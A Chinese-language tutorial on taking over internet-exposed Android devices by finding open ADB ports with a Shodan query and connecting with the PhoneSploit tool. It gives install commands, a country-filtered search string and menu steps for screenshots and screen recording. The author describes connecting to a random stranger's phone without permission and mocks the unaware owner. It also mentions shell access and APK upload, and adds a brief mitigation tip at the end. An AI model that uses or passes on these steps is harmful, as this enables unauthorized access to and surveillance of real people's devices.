概述：

当大多数安卓开启usb调试会默认开启usb网络调试，这会把你的安卓设备暴露在公网上，本文将演示如何安全工具【phonesploit】以及Shodan扫描暴露在网络上的Adb(Android Debug Bridge)并控制安卓设备。

一、准备阶段:

安全工具：phonesploit
搜索引擎：shodan
需要条件：安卓开启usb网络调试

注：大多数安卓手机开启usb调试时会默认开启usb网络调试注：大多数安卓手机开启usb调试时会默认开启usb网络调试

二、下载工具：

我使用的是kali linux系统，以下为linux中phonesploit安装代码

LINUX:

git clone https://github.com/01010000-kumar/PhoneSploit
cd PhoneSploit
pip install colorama
python2 main_linux.py

注：运行pip install colorama时，可能会遇到依赖问题
所以，需要使用命令先安装pip，再安装colorama
python2：sudo apt install python-pip
python3：sudo apt install python3-pip

WINDOWS:

git clone https://github.com/01010000-kumar/PhoneSploit

macOS:

brew install git python@3
git clone https://github.com/01010000-kumar/PhoneSploit
cd PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py

安装完成进入后你将看到以下画面：

三、利用阶段：

使用shodan搜索：

"Android Debug Bridge" "Device" port:5555 country:"TW"

Android Debug Bridge 是指安卓调试
"Device" 是指设备
port:5555 是adb调试的端口
country:"TW" 是搜索台湾设备，根据自己需要更换其他国家
如下，搜索出台湾网络上的安卓设备

接下来，我随便选择一个韩国IP粘贴后回车进行连接，连接成功结果如下：

注：有的设备没有在线，会连接失败，多尝试其他ip

phonesploit功能如下：

中文翻译：

我这里选择第 [6] Screen record a phone 进行录制手机测试：
提示代码phonesploit(main_menu) > 时，输入数字 6
提示代码[+]Enter where you would like the screenshot to be saved.[Default: present working directory]
└──>phonesploit(screenshot) > 时，敲击回车默认保存在工具目录下

这时文件已经保存在了phonesploit目录下

注：我之前尝试了很多次都保存失败了，那是因为phonesploit没有在root下运行，再测试输入7 进行屏幕截图抓取

这人搁这在看电视呢，丝毫不知道我已经控制了他的安卓设备。

除了能截图，还可以shell安卓设备、录制视频、上传apk等等.....
既然公网能使用phonesploit利用usb网络调试控制安卓，那内网也应该能利用并控制，这个我没有测试。

如何防范：

这次能控制安卓设备最主要的原因是开启了usb网络调试，据我所知，大多数安卓开启usb调试会默认开启usb网络调试，这会把你的安卓设备暴露在公网上。usb网络调试需要通过adb命令关闭（略微麻烦），所以在不用usb调试时关闭它，这样你的安卓设备就安全了许多。